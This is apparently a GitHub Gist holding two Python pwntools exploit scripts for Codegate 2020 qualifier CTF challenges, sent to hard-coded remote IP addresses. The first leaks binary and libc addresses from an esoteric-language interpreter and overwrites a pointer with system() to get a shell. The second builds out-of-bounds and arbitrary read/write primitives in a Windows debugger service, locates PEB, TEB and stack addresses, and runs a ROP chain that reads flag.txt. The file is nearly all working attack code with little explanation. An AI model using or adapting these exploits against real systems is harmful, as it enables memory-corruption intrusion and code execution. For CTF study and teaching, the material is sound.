Last active
July 4, 2021 15:33
-
-
Save ujin5/d8d8d3b06ad4e638849a9e022c516205 to your computer and use it in GitHub Desktop.
Codegate 2020 Quals
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #s = remote("0", 1234) | |
| s = remote("58.229.240.181", 7777) | |
| context.log_level = "debug" | |
| s.recvuntil(">>>") | |
| s.sendline("+[[."+"<"*0x8+"[.>]"+"<"*(0x6e+0x8)+"[.>]"+">"*(0x10-0x6)+"[,>]"+"<"*(0x6+0x10)+"[,>]"+">"*(0x80-0xe)+",>,<.]]") | |
| base = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x201090 | |
| print "BASE @ " + hex(base) | |
| libc = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x0000000000110140 #- 0x18eef0 | |
| print "libc @ " + hex(libc) | |
| system = libc + 0x4f440 | |
| alloc = base + 0x0000927 | |
| s.send(p64(system)[:6]) | |
| s.send(p64(alloc)[:6]) | |
| s.send("sh") | |
| ''' | |
| ret = libc + 0x1101a9 | |
| raw_input() | |
| s.send(p64(libc+0x4f322)) | |
| ''' | |
| s.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #s = remote("14.47.79.136", 54321) | |
| #context.log_level = 'debug' | |
| s = remote("183.107.102.15",54321) | |
| #s = remote("52.78.198.47",54321) | |
| code = [] | |
| code.append("v>>>>>>>>>>&##s") | |
| code.append(">&|>>>>>>>>>^") | |
| code.append(">&>&&&p&>>>&|") | |
| code.append("<<<<<<.g&&<<v") | |
| code.append("<<<<<<<<<<|&<") | |
| code.append("<<<<<<p&&&<<v") | |
| code.append("FAKE"*20) | |
| s.sendline("80") | |
| s.sendline(str(len(code))) | |
| for line in code: | |
| print line | |
| s.sendline(line) | |
| # BuG Trigger | |
| s.recvuntil(">") | |
| s.sendline("run") | |
| s.recvuntil(">") | |
| s.sendline("cycle 100") | |
| s.sendline("1 115") | |
| s.recvuntil(">") | |
| s.sendline("run") | |
| s.recvuntil(">") | |
| s.sendline("cycle 100") | |
| s.sendline("0 62 12 0 255 1") | |
| def oob_read_u8(x,y): | |
| s.recvuntil(">") | |
| s.sendline("run") | |
| s.recvuntil(">") | |
| s.sendline("step 100") | |
| s.sendline("0 62 12 0 255 0 1 %d %d"%(x,y)) | |
| r = int(s.recvuntil("executed.").split(" ")[1], 10) | |
| return p8(r) | |
| def oob_read_u64(x,y): | |
| leak = "" | |
| for i in range(0,8): | |
| leak += oob_read_u8(x+i,y) | |
| leak = u64(leak) | |
| return leak | |
| def oob_write_u8(x,y,val): | |
| s.recvuntil(">") | |
| s.sendline("run") | |
| s.recvuntil(">") | |
| s.sendline("step 100") | |
| s.sendline("0 62 12 0 255 0 0 %d %d %d"%(val,x,y)) | |
| def oob_write_u64(x,y,val): | |
| val = p64(val) | |
| for c in val: | |
| oob_write_u8(x,y,u8(c)) | |
| x += 1 | |
| def arb_read(addr): | |
| oob_write_u64(0x20,0x5,addr) | |
| return oob_read_u64(0x0,0x6) | |
| def arb_read_u16(addr): | |
| oob_write_u64(0x20,0x5,addr) | |
| low = u8(oob_read_u8(0x0,0x6)) | |
| oob_write_u64(0x20,0x5,addr+1) | |
| hi = u8(oob_read_u8(0x0,0x6)) | |
| return low | (hi<<8) | |
| def arb_write(addr,val): | |
| oob_write_u64(0x20,0x5,addr) | |
| return oob_write_u64(0x0,0x6,val) | |
| def hexdump(addr, size = 0x10): | |
| print "-"*5+"hexdump"+"-"*5 | |
| for i in range(0,size): | |
| r = arb_read(addr + 0x8*i) | |
| print hex(r) | |
| oob_write_u8(0x30,0,0xff) | |
| oob_write_u8(0x30,1,0xff) | |
| oob_write_u8(0x30,2,0xff) | |
| oob_write_u8(0x30,3,0xff) | |
| oob_write_u8(0x30,4,0xff) | |
| leak = oob_read_u64(0x20,5) | |
| print "HEAP @ "+hex(leak) | |
| oob_write_u64(0x20,5,0x414141414141) | |
| oob_write_u64(0x30,5,0x10000) | |
| oob_write_u64(0x38,5,0x10000) | |
| #hexdump(leak, 0x15) | |
| VCRUNTIME140 = arb_read(leak+13*8) - 0xe000 | |
| print "VCRUNTIME140 @ "+hex(VCRUNTIME140) | |
| KERNEL32 = arb_read(VCRUNTIME140+0xe008) - 0x001cd20 | |
| print "KERNEL32 @ "+hex(KERNEL32) | |
| NTDLL = arb_read(KERNEL32+0x07AB00) - 0x0d010#RtlAllocateHeap | |
| print "NTDLL @ " + hex(NTDLL) | |
| PebLdr = (NTDLL+0x1653C0) | |
| print "PebLdr @ " + hex(PebLdr) | |
| binBase = arb_read(arb_read(PebLdr+0x20)+0x20) | |
| print "binBase @ "+hex(binBase) | |
| ucrtbase = arb_read(binBase + 0x00A2B8) - 0x0c7b0 | |
| print "ucrtbase @ "+hex(ucrtbase) | |
| PEB = arb_read(PebLdr - 0x98) - 0x80 | |
| print "PEB @ "+hex(PEB) | |
| TEB = PEB + 0x1000 | |
| print "TEB @ "+hex(TEB) | |
| stackAddr = arb_read(TEB + 0x10) | |
| print "stack Address @ "+hex(stackAddr) | |
| stackEnd = stackAddr + (0x10000 - (stackAddr & 0xffff)) - 0x8 | |
| returnAddr = binBase + 0x00007fad | |
| print hex(returnAddr) | |
| retPtr = stackAddr + 0x4808 | |
| here = -1 | |
| for i in range(0, 0x1000/0x10): | |
| temp = arb_read_u16(retPtr + i*0x10) | |
| if temp == (returnAddr&0xffff): | |
| here = i | |
| break | |
| print("boooom : "+hex(0x4808+here*0x10)) | |
| arb_write(retPtr + here*0x10, 0x4141414141) | |
| gadget1 = NTDLL + 0x9217b #: pop rcx ; ret | |
| gadget2 = NTDLL + 0x057642 #: pop rdx ; ret | |
| gadget3 = NTDLL + 0x08fb31 # pop rcx ; pop r8 ; pop r9 ; pop r10 ; pop r11 ; ret | |
| gadget4 = NTDLL + 0x02a3b # add rsp, 0x38 ; ret | |
| pivot = NTDLL + 0x10bba5 # add rsp, 0x508 ; ret#+ 0x6e48c # add rsp, 0x240 ; pop rdi ; ret | |
| _open = ucrtbase + 0x000a2a30 | |
| _read = ucrtbase + 0x0016270 | |
| _puts = ucrtbase + 0x0080760 | |
| bss = binBase + 0xf000 | |
| cmd = "flag.txt\x00" | |
| i = 0 | |
| for c in cmd: | |
| arb_write(bss+ i, ord(c)) | |
| i += 1 | |
| rop_chain = [ | |
| gadget2, | |
| 0x0, | |
| gadget3, | |
| bss, | |
| 0x40, | |
| 0, | |
| 0, | |
| 0, | |
| gadget1+1, | |
| _open, | |
| gadget4, 0, 0, 0, 0, 0, 0, 0, | |
| gadget2, | |
| bss+0x10, | |
| gadget3, | |
| 0x3, | |
| 0x100, | |
| 0, | |
| 0, | |
| 0, | |
| _read, | |
| gadget4, 0, 0, 0, 0, 0, 0, 0, | |
| gadget1, | |
| bss+0x10, | |
| _puts | |
| ] | |
| arb_write(retPtr + here*0x10, pivot) | |
| retPtr = retPtr + here*0x10 + 0x508 + 0x8 | |
| for i, c in enumerate(rop_chain): | |
| arb_write(retPtr + i*0x8, c) | |
| s.sendline("quit") | |
| #CODEGATE2020{pwn1ng_da7_d3bugger_w17h_an0th3r_d1m3nsi0n} | |
| s.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment